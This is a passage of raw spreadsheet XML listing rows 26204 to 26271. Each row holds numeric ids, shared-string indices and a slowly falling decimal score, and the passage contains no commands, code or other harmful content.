      <c r="D26204" s="2">
        <v>1.0</v>
      </c>
      <c r="E26204" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26204" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="26205" ht="15.75" customHeight="1">
      <c r="A26205" s="1">
        <v>28044.0</v>
      </c>
      <c r="B26205" s="2">
        <v>2.4538133E7</v>
      </c>
      <c r="C26205" s="2" t="s">
        <v>25196</v>
      </c>
      <c r="D26205" s="2">
        <v>1.0</v>
      </c>
      <c r="E26205" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26205" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="26206" ht="15.75" customHeight="1">
      <c r="A26206" s="1">
        <v>32357.0</v>
      </c>
      <c r="B26206" s="2">
        <v>5.5939907E7</v>
      </c>
      <c r="C26206" s="2" t="s">
        <v>25197</v>
      </c>
      <c r="D26206" s="2">
        <v>1.0</v>
      </c>
      <c r="E26206" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26206" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="26207" ht="15.75" customHeight="1">
      <c r="A26207" s="1">
        <v>20417.0</v>
      </c>
      <c r="B26207" s="2">
        <v>1.2288492E7</v>
      </c>
      <c r="C26207" s="2" t="s">
        <v>25198</v>
      </c>
      <c r="D26207" s="2">
        <v>1.0</v>
      </c>
      <c r="E26207" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26207" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="26208" ht="15.75" customHeight="1">
      <c r="A26208" s="1">
        <v>20914.0</v>
      </c>
      <c r="B26208" s="2">
        <v>1.6338946E7</v>
      </c>
      <c r="C26208" s="2" t="s">
        <v>25199</v>
      </c>
      <c r="D26208" s="2">
        <v>1.0</v>
      </c>
      <c r="E26208" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26208" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="26209" ht="15.75" customHeight="1">
      <c r="A26209" s="1">
        <v>22269.0</v>
      </c>
      <c r="B26209" s="2">
        <v>3.315389E7</v>
      </c>
      <c r="C26209" s="2" t="s">
        <v>25200</v>
      </c>
      <c r="D26209" s="2">
        <v>1.0</v>
      </c>
      <c r="E26209" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26209" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="26210" ht="15.75" customHeight="1">
      <c r="A26210" s="1">
        <v>30664.0</v>
      </c>
      <c r="B26210" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C26210" s="2" t="s">
        <v>25201</v>
      </c>
      <c r="D26210" s="2">
        <v>1.0</v>
      </c>
      <c r="E26210" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26210" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="26211" ht="15.75" customHeight="1">
      <c r="A26211" s="1">
        <v>31557.0</v>
      </c>
      <c r="B26211" s="2">
        <v>5120671.0</v>
      </c>
      <c r="C26211" s="2" t="s">
        <v>25202</v>
      </c>
      <c r="D26211" s="2">
        <v>1.0</v>
      </c>
      <c r="E26211" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26211" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="26212" ht="15.75" customHeight="1">
      <c r="A26212" s="1">
        <v>7793.0</v>
      </c>
      <c r="B26212" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C26212" s="2" t="s">
        <v>25203</v>
      </c>
      <c r="D26212" s="2">
        <v>1.0</v>
      </c>
      <c r="E26212" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26212" s="2">
        <v>0.1199677938808374</v>
      </c>
    </row>
    <row r="26213" ht="15.75" customHeight="1">
      <c r="A26213" s="1">
        <v>16475.0</v>
      </c>
      <c r="B26213" s="2">
        <v>4.6504704E7</v>
      </c>
      <c r="C26213" s="2" t="s">
        <v>25204</v>
      </c>
      <c r="D26213" s="2">
        <v>1.0</v>
      </c>
      <c r="E26213" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26213" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="26214" ht="15.75" customHeight="1">
      <c r="A26214" s="1">
        <v>24087.0</v>
      </c>
      <c r="B26214" s="2">
        <v>9758067.0</v>
      </c>
      <c r="C26214" s="2" t="s">
        <v>25205</v>
      </c>
      <c r="D26214" s="2">
        <v>1.0</v>
      </c>
      <c r="E26214" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26214" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="26215" ht="15.75" customHeight="1">
      <c r="A26215" s="1">
        <v>645.0</v>
      </c>
      <c r="B26215" s="2">
        <v>1.9875247E7</v>
      </c>
      <c r="C26215" s="2" t="s">
        <v>25206</v>
      </c>
      <c r="D26215" s="2">
        <v>1.0</v>
      </c>
      <c r="E26215" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26215" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="26216" ht="15.75" customHeight="1">
      <c r="A26216" s="1">
        <v>12521.0</v>
      </c>
      <c r="B26216" s="2">
        <v>2.969816E7</v>
      </c>
      <c r="C26216" s="2" t="s">
        <v>25207</v>
      </c>
      <c r="D26216" s="2">
        <v>1.0</v>
      </c>
      <c r="E26216" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26216" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="26217" ht="15.75" customHeight="1">
      <c r="A26217" s="1">
        <v>14390.0</v>
      </c>
      <c r="B26217" s="2">
        <v>3.9086537E7</v>
      </c>
      <c r="C26217" s="2" t="s">
        <v>25208</v>
      </c>
      <c r="D26217" s="2">
        <v>1.0</v>
      </c>
      <c r="E26217" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26217" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="26218" ht="15.75" customHeight="1">
      <c r="A26218" s="1">
        <v>30076.0</v>
      </c>
      <c r="B26218" s="2">
        <v>3625318.0</v>
      </c>
      <c r="C26218" s="2" t="s">
        <v>25209</v>
      </c>
      <c r="D26218" s="2">
        <v>1.0</v>
      </c>
      <c r="E26218" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26218" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="26219" ht="15.75" customHeight="1">
      <c r="A26219" s="1">
        <v>26108.0</v>
      </c>
      <c r="B26219" s="2">
        <v>1.5780003E7</v>
      </c>
      <c r="C26219" s="2" t="s">
        <v>25210</v>
      </c>
      <c r="D26219" s="2">
        <v>1.0</v>
      </c>
      <c r="E26219" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26219" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="26220" ht="15.75" customHeight="1">
      <c r="A26220" s="1">
        <v>31768.0</v>
      </c>
      <c r="B26220" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C26220" s="2" t="s">
        <v>25211</v>
      </c>
      <c r="D26220" s="2">
        <v>1.0</v>
      </c>
      <c r="E26220" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26220" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="26221" ht="15.75" customHeight="1">
      <c r="A26221" s="1">
        <v>8130.0</v>
      </c>
      <c r="B26221" s="2">
        <v>5.3101105E7</v>
      </c>
      <c r="C26221" s="2" t="s">
        <v>25212</v>
      </c>
      <c r="D26221" s="2">
        <v>1.0</v>
      </c>
      <c r="E26221" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26221" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="26222" ht="15.75" customHeight="1">
      <c r="A26222" s="1">
        <v>13075.0</v>
      </c>
      <c r="B26222" s="2">
        <v>3.3340182E7</v>
      </c>
      <c r="C26222" s="2" t="s">
        <v>25213</v>
      </c>
      <c r="D26222" s="2">
        <v>1.0</v>
      </c>
      <c r="E26222" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26222" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="26223" ht="15.75" customHeight="1">
      <c r="A26223" s="1">
        <v>20412.0</v>
      </c>
      <c r="B26223" s="2">
        <v>1.221141E7</v>
      </c>
      <c r="C26223" s="2" t="s">
        <v>25214</v>
      </c>
      <c r="D26223" s="2">
        <v>1.0</v>
      </c>
      <c r="E26223" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26223" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="26224" ht="15.75" customHeight="1">
      <c r="A26224" s="1">
        <v>1747.0</v>
      </c>
      <c r="B26224" s="2">
        <v>2.8818039E7</v>
      </c>
      <c r="C26224" s="2" t="s">
        <v>25215</v>
      </c>
      <c r="D26224" s="2">
        <v>1.0</v>
      </c>
      <c r="E26224" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26224" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26225" ht="15.75" customHeight="1">
      <c r="A26225" s="1">
        <v>2726.0</v>
      </c>
      <c r="B26225" s="2">
        <v>3.4957965E7</v>
      </c>
      <c r="C26225" s="2" t="s">
        <v>25216</v>
      </c>
      <c r="D26225" s="2">
        <v>1.0</v>
      </c>
      <c r="E26225" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26225" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26226" ht="15.75" customHeight="1">
      <c r="A26226" s="1">
        <v>9128.0</v>
      </c>
      <c r="B26226" s="2">
        <v>5.5226158E7</v>
      </c>
      <c r="C26226" s="2" t="s">
        <v>25217</v>
      </c>
      <c r="D26226" s="2">
        <v>1.0</v>
      </c>
      <c r="E26226" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26226" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26227" ht="15.75" customHeight="1">
      <c r="A26227" s="1">
        <v>9766.0</v>
      </c>
      <c r="B26227" s="2">
        <v>5.6499611E7</v>
      </c>
      <c r="C26227" s="2" t="s">
        <v>25218</v>
      </c>
      <c r="D26227" s="2">
        <v>1.0</v>
      </c>
      <c r="E26227" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26227" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26228" ht="15.75" customHeight="1">
      <c r="A26228" s="1">
        <v>20772.0</v>
      </c>
      <c r="B26228" s="2">
        <v>1.4972946E7</v>
      </c>
      <c r="C26228" s="2" t="s">
        <v>25219</v>
      </c>
      <c r="D26228" s="2">
        <v>1.0</v>
      </c>
      <c r="E26228" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26228" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26229" ht="15.75" customHeight="1">
      <c r="A26229" s="1">
        <v>23580.0</v>
      </c>
      <c r="B26229" s="2">
        <v>6259017.0</v>
      </c>
      <c r="C26229" s="2" t="s">
        <v>25220</v>
      </c>
      <c r="D26229" s="2">
        <v>1.0</v>
      </c>
      <c r="E26229" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26229" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26230" ht="15.75" customHeight="1">
      <c r="A26230" s="1">
        <v>24775.0</v>
      </c>
      <c r="B26230" s="2">
        <v>1.188046E7</v>
      </c>
      <c r="C26230" s="2" t="s">
        <v>25221</v>
      </c>
      <c r="D26230" s="2">
        <v>1.0</v>
      </c>
      <c r="E26230" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26230" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26231" ht="15.75" customHeight="1">
      <c r="A26231" s="1">
        <v>24886.0</v>
      </c>
      <c r="B26231" s="2">
        <v>1.2244765E7</v>
      </c>
      <c r="C26231" s="2" t="s">
        <v>25222</v>
      </c>
      <c r="D26231" s="2">
        <v>1.0</v>
      </c>
      <c r="E26231" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26231" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26232" ht="15.75" customHeight="1">
      <c r="A26232" s="1">
        <v>25915.0</v>
      </c>
      <c r="B26232" s="2">
        <v>1.5135265E7</v>
      </c>
      <c r="C26232" s="2" t="s">
        <v>6057</v>
      </c>
      <c r="D26232" s="2">
        <v>1.0</v>
      </c>
      <c r="E26232" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26232" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26233" ht="15.75" customHeight="1">
      <c r="A26233" s="1">
        <v>26686.0</v>
      </c>
      <c r="B26233" s="2">
        <v>1.8124607E7</v>
      </c>
      <c r="C26233" s="2" t="s">
        <v>25223</v>
      </c>
      <c r="D26233" s="2">
        <v>1.0</v>
      </c>
      <c r="E26233" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26233" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26234" ht="15.75" customHeight="1">
      <c r="A26234" s="1">
        <v>30103.0</v>
      </c>
      <c r="B26234" s="2">
        <v>3.6564288E7</v>
      </c>
      <c r="C26234" s="2" t="s">
        <v>25224</v>
      </c>
      <c r="D26234" s="2">
        <v>1.0</v>
      </c>
      <c r="E26234" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26234" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26235" ht="15.75" customHeight="1">
      <c r="A26235" s="1">
        <v>34261.0</v>
      </c>
      <c r="B26235" s="2">
        <v>8044210.0</v>
      </c>
      <c r="C26235" s="2" t="s">
        <v>25225</v>
      </c>
      <c r="D26235" s="2">
        <v>1.0</v>
      </c>
      <c r="E26235" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26235" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="26236" ht="15.75" customHeight="1">
      <c r="A26236" s="1">
        <v>956.0</v>
      </c>
      <c r="B26236" s="2">
        <v>2.2656269E7</v>
      </c>
      <c r="C26236" s="2" t="s">
        <v>25226</v>
      </c>
      <c r="D26236" s="2">
        <v>1.0</v>
      </c>
      <c r="E26236" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26236" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="26237" ht="15.75" customHeight="1">
      <c r="A26237" s="1">
        <v>10998.0</v>
      </c>
      <c r="B26237" s="2">
        <v>1.7590651E7</v>
      </c>
      <c r="C26237" s="2" t="s">
        <v>25227</v>
      </c>
      <c r="D26237" s="2">
        <v>1.0</v>
      </c>
      <c r="E26237" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26237" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="26238" ht="15.75" customHeight="1">
      <c r="A26238" s="1">
        <v>15681.0</v>
      </c>
      <c r="B26238" s="2">
        <v>4.3834417E7</v>
      </c>
      <c r="C26238" s="2" t="s">
        <v>25228</v>
      </c>
      <c r="D26238" s="2">
        <v>1.0</v>
      </c>
      <c r="E26238" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26238" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="26239" ht="15.75" customHeight="1">
      <c r="A26239" s="1">
        <v>24327.0</v>
      </c>
      <c r="B26239" s="2">
        <v>1.0664112E7</v>
      </c>
      <c r="C26239" s="2" t="s">
        <v>25229</v>
      </c>
      <c r="D26239" s="2">
        <v>1.0</v>
      </c>
      <c r="E26239" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26239" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="26240" ht="15.75" customHeight="1">
      <c r="A26240" s="1">
        <v>24834.0</v>
      </c>
      <c r="B26240" s="2">
        <v>1.2152449E7</v>
      </c>
      <c r="C26240" s="2" t="s">
        <v>25230</v>
      </c>
      <c r="D26240" s="2">
        <v>1.0</v>
      </c>
      <c r="E26240" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26240" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="26241" ht="15.75" customHeight="1">
      <c r="A26241" s="1">
        <v>27312.0</v>
      </c>
      <c r="B26241" s="2">
        <v>2.1366991E7</v>
      </c>
      <c r="C26241" s="2" t="s">
        <v>25231</v>
      </c>
      <c r="D26241" s="2">
        <v>1.0</v>
      </c>
      <c r="E26241" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26241" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="26242" ht="15.75" customHeight="1">
      <c r="A26242" s="1">
        <v>34218.0</v>
      </c>
      <c r="B26242" s="2">
        <v>3.3734117E7</v>
      </c>
      <c r="C26242" s="2" t="s">
        <v>25232</v>
      </c>
      <c r="D26242" s="2">
        <v>1.0</v>
      </c>
      <c r="E26242" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26242" s="2">
        <v>0.118945868945869</v>
      </c>
    </row>
    <row r="26243" ht="15.75" customHeight="1">
      <c r="A26243" s="1">
        <v>28490.0</v>
      </c>
      <c r="B26243" s="2">
        <v>2.6668519E7</v>
      </c>
      <c r="C26243" s="2" t="s">
        <v>25233</v>
      </c>
      <c r="D26243" s="2">
        <v>1.0</v>
      </c>
      <c r="E26243" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26243" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="26244" ht="15.75" customHeight="1">
      <c r="A26244" s="1">
        <v>32025.0</v>
      </c>
      <c r="B26244" s="2">
        <v>5.3591903E7</v>
      </c>
      <c r="C26244" s="2" t="s">
        <v>25234</v>
      </c>
      <c r="D26244" s="2">
        <v>1.0</v>
      </c>
      <c r="E26244" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26244" s="2">
        <v>0.1188034188034188</v>
      </c>
    </row>
    <row r="26245" ht="15.75" customHeight="1">
      <c r="A26245" s="1">
        <v>698.0</v>
      </c>
      <c r="B26245" s="2">
        <v>2.0457698E7</v>
      </c>
      <c r="C26245" s="2" t="s">
        <v>25235</v>
      </c>
      <c r="D26245" s="2">
        <v>1.0</v>
      </c>
      <c r="E26245" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26245" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26246" ht="15.75" customHeight="1">
      <c r="A26246" s="1">
        <v>1470.0</v>
      </c>
      <c r="B26246" s="2">
        <v>2.6978356E7</v>
      </c>
      <c r="C26246" s="2" t="s">
        <v>25236</v>
      </c>
      <c r="D26246" s="2">
        <v>1.0</v>
      </c>
      <c r="E26246" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26246" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26247" ht="15.75" customHeight="1">
      <c r="A26247" s="1">
        <v>2864.0</v>
      </c>
      <c r="B26247" s="2">
        <v>3.5546396E7</v>
      </c>
      <c r="C26247" s="2" t="s">
        <v>25237</v>
      </c>
      <c r="D26247" s="2">
        <v>1.0</v>
      </c>
      <c r="E26247" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26247" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26248" ht="15.75" customHeight="1">
      <c r="A26248" s="1">
        <v>3945.0</v>
      </c>
      <c r="B26248" s="2">
        <v>4.0622023E7</v>
      </c>
      <c r="C26248" s="2" t="s">
        <v>25238</v>
      </c>
      <c r="D26248" s="2">
        <v>1.0</v>
      </c>
      <c r="E26248" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26248" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26249" ht="15.75" customHeight="1">
      <c r="A26249" s="1">
        <v>6312.0</v>
      </c>
      <c r="B26249" s="2">
        <v>4.824564E7</v>
      </c>
      <c r="C26249" s="2" t="s">
        <v>25239</v>
      </c>
      <c r="D26249" s="2">
        <v>1.0</v>
      </c>
      <c r="E26249" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26249" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26250" ht="15.75" customHeight="1">
      <c r="A26250" s="1">
        <v>7378.0</v>
      </c>
      <c r="B26250" s="2">
        <v>5.1051597E7</v>
      </c>
      <c r="C26250" s="2" t="s">
        <v>25240</v>
      </c>
      <c r="D26250" s="2">
        <v>1.0</v>
      </c>
      <c r="E26250" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26250" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26251" ht="15.75" customHeight="1">
      <c r="A26251" s="1">
        <v>9123.0</v>
      </c>
      <c r="B26251" s="2">
        <v>5.5221518E7</v>
      </c>
      <c r="C26251" s="2" t="s">
        <v>25241</v>
      </c>
      <c r="D26251" s="2">
        <v>1.0</v>
      </c>
      <c r="E26251" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26251" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26252" ht="15.75" customHeight="1">
      <c r="A26252" s="1">
        <v>11090.0</v>
      </c>
      <c r="B26252" s="2">
        <v>1.8515326E7</v>
      </c>
      <c r="C26252" s="2" t="s">
        <v>25242</v>
      </c>
      <c r="D26252" s="2">
        <v>1.0</v>
      </c>
      <c r="E26252" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26252" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26253" ht="15.75" customHeight="1">
      <c r="A26253" s="1">
        <v>12665.0</v>
      </c>
      <c r="B26253" s="2">
        <v>3.0558965E7</v>
      </c>
      <c r="C26253" s="2" t="s">
        <v>25243</v>
      </c>
      <c r="D26253" s="2">
        <v>1.0</v>
      </c>
      <c r="E26253" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26253" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26254" ht="15.75" customHeight="1">
      <c r="A26254" s="1">
        <v>17146.0</v>
      </c>
      <c r="B26254" s="2">
        <v>4.8845281E7</v>
      </c>
      <c r="C26254" s="2" t="s">
        <v>25244</v>
      </c>
      <c r="D26254" s="2">
        <v>1.0</v>
      </c>
      <c r="E26254" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26254" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26255" ht="15.75" customHeight="1">
      <c r="A26255" s="1">
        <v>20510.0</v>
      </c>
      <c r="B26255" s="2">
        <v>1.3047675E7</v>
      </c>
      <c r="C26255" s="2" t="s">
        <v>25245</v>
      </c>
      <c r="D26255" s="2">
        <v>1.0</v>
      </c>
      <c r="E26255" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26255" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26256" ht="15.75" customHeight="1">
      <c r="A26256" s="1">
        <v>20534.0</v>
      </c>
      <c r="B26256" s="2">
        <v>1.3225423E7</v>
      </c>
      <c r="C26256" s="2" t="s">
        <v>25246</v>
      </c>
      <c r="D26256" s="2">
        <v>1.0</v>
      </c>
      <c r="E26256" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26256" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26257" ht="15.75" customHeight="1">
      <c r="A26257" s="1">
        <v>20602.0</v>
      </c>
      <c r="B26257" s="2">
        <v>1.3874601E7</v>
      </c>
      <c r="C26257" s="2" t="s">
        <v>25247</v>
      </c>
      <c r="D26257" s="2">
        <v>1.0</v>
      </c>
      <c r="E26257" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26257" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26258" ht="15.75" customHeight="1">
      <c r="A26258" s="1">
        <v>21799.0</v>
      </c>
      <c r="B26258" s="2">
        <v>2.6668429E7</v>
      </c>
      <c r="C26258" s="2" t="s">
        <v>25248</v>
      </c>
      <c r="D26258" s="2">
        <v>1.0</v>
      </c>
      <c r="E26258" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26258" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26259" ht="15.75" customHeight="1">
      <c r="A26259" s="1">
        <v>24161.0</v>
      </c>
      <c r="B26259" s="2">
        <v>1.0149511E7</v>
      </c>
      <c r="C26259" s="2" t="s">
        <v>25249</v>
      </c>
      <c r="D26259" s="2">
        <v>1.0</v>
      </c>
      <c r="E26259" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26259" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26260" ht="15.75" customHeight="1">
      <c r="A26260" s="1">
        <v>25434.0</v>
      </c>
      <c r="B26260" s="2">
        <v>1.3836742E7</v>
      </c>
      <c r="C26260" s="2" t="s">
        <v>25250</v>
      </c>
      <c r="D26260" s="2">
        <v>1.0</v>
      </c>
      <c r="E26260" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26260" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26261" ht="15.75" customHeight="1">
      <c r="A26261" s="1">
        <v>26552.0</v>
      </c>
      <c r="B26261" s="2">
        <v>1.7793623E7</v>
      </c>
      <c r="C26261" s="2" t="s">
        <v>25251</v>
      </c>
      <c r="D26261" s="2">
        <v>1.0</v>
      </c>
      <c r="E26261" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26261" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26262" ht="15.75" customHeight="1">
      <c r="A26262" s="1">
        <v>28094.0</v>
      </c>
      <c r="B26262" s="2">
        <v>2.4654294E7</v>
      </c>
      <c r="C26262" s="5" t="s">
        <v>25252</v>
      </c>
      <c r="D26262" s="2">
        <v>1.0</v>
      </c>
      <c r="E26262" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26262" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26263" ht="15.75" customHeight="1">
      <c r="A26263" s="1">
        <v>28125.0</v>
      </c>
      <c r="B26263" s="2">
        <v>2.4719185E7</v>
      </c>
      <c r="C26263" s="2" t="s">
        <v>25253</v>
      </c>
      <c r="D26263" s="2">
        <v>1.0</v>
      </c>
      <c r="E26263" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26263" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="26264" ht="15.75" customHeight="1">
      <c r="A26264" s="1">
        <v>33395.0</v>
      </c>
      <c r="B26264" s="2">
        <v>7701500.0</v>
      </c>
      <c r="C26264" s="2" t="s">
        <v>25254</v>
      </c>
      <c r="D26264" s="2">
        <v>1.0</v>
      </c>
      <c r="E26264" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26264" s="2">
        <v>0.1184640522875817</v>
      </c>
    </row>
    <row r="26265" ht="15.75" customHeight="1">
      <c r="A26265" s="1">
        <v>1407.0</v>
      </c>
      <c r="B26265" s="2">
        <v>2.6324728E7</v>
      </c>
      <c r="C26265" s="2" t="s">
        <v>25255</v>
      </c>
      <c r="D26265" s="2">
        <v>1.0</v>
      </c>
      <c r="E26265" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26265" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="26266" ht="15.75" customHeight="1">
      <c r="A26266" s="1">
        <v>4390.0</v>
      </c>
      <c r="B26266" s="2">
        <v>4.222002E7</v>
      </c>
      <c r="C26266" s="2" t="s">
        <v>25256</v>
      </c>
      <c r="D26266" s="2">
        <v>1.0</v>
      </c>
      <c r="E26266" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26266" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="26267" ht="15.75" customHeight="1">
      <c r="A26267" s="1">
        <v>11811.0</v>
      </c>
      <c r="B26267" s="2">
        <v>2.4480917E7</v>
      </c>
      <c r="C26267" s="2" t="s">
        <v>25257</v>
      </c>
      <c r="D26267" s="2">
        <v>1.0</v>
      </c>
      <c r="E26267" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26267" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="26268" ht="15.75" customHeight="1">
      <c r="A26268" s="1">
        <v>18646.0</v>
      </c>
      <c r="B26268" s="2">
        <v>5.3432973E7</v>
      </c>
      <c r="C26268" s="2" t="s">
        <v>25258</v>
      </c>
      <c r="D26268" s="2">
        <v>1.0</v>
      </c>
      <c r="E26268" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26268" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="26269" ht="15.75" customHeight="1">
      <c r="A26269" s="1">
        <v>21738.0</v>
      </c>
      <c r="B26269" s="2">
        <v>2.5879565E7</v>
      </c>
      <c r="C26269" s="2" t="s">
        <v>25259</v>
      </c>
      <c r="D26269" s="2">
        <v>1.0</v>
      </c>
      <c r="E26269" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26269" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="26270" ht="15.75" customHeight="1">
      <c r="A26270" s="1">
        <v>24443.0</v>
      </c>
      <c r="B26270" s="2">
        <v>1.089644E7</v>
      </c>
      <c r="C26270" s="2" t="s">
        <v>25260</v>
      </c>
      <c r="D26270" s="2">
        <v>1.0</v>
      </c>
      <c r="E26270" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26270" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="26271" ht="15.75" customHeight="1">
      <c r="A26271" s="1">
        <v>26640.0</v>
      </c>
      <c r="B26271" s="2">
        <v>1.8046118E7</v>
      </c>
      <c r="C26271" s="2" t="s">
        <v>25261</v>
      </c>
      <c r="D26271" s="2">
